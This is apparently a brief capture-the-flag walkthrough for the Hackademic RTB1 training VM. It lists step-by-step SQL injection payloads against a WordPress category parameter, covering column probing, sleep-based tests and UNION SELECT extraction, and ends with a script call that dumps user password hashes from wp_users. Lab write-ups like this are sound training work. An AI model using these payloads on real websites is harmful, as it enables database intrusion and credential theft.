This is the first realistic hackademic challenge (root this box) by mr.pr0n Download the target and get root. After all, try to read the contents of the file 'key.txt' in the root directory. Enjoy!
Hackademic RTB1 VM DownloadThe PoC that i wrote for automating the SQL injection can be found Here
http://192.168.216.139/Hackademic_RTB1/?cat=1
http://192.168.216.139/Hackademic_RTB1/?cat=1'
http://192.168.216.139/Hackademic_RTB1/?cat=1 order by 1
http://192.168.216.139/Hackademic_RTB1/?cat=1 order by 2
http://192.168.216.139/Hackademic_RTB1/?cat=1 order by 3
http://192.168.216.139/Hackademic_RTB1/?cat=1 order by 4
http://192.168.216.139/Hackademic_RTB1/?cat=1 order by 5
http://192.168.216.139/Hackademic_RTB1/?cat=1 order by 6
WordPress database error: [Unknown column '6' in 'order clause']
SELECT * FROM wp_categories WHERE cat_ID = 1 order by 6 LIMIT 1
http://192.168.216.139/Hackademic_RTB1/?cat=1 and sleep(0)
http://192.168.216.139/Hackademic_RTB1/?cat=1 and sleep(5)
http://192.168.216.139/Hackademic_RTB1/?cat=1 and sleep(0) union select 1,2,3,4,5
http://192.168.216.139/Hackademic_RTB1/?cat=1 and sleep(0) union select 1,version(),3,4,5
http://192.168.216.139/Hackademic_RTB1/?cat=1 and sleep(0) union select 1,user(),3,4,5
./poc.py 192.168.216.139 'group_concat(id,0x20,user_pass,0x20,user_login) from wp_users'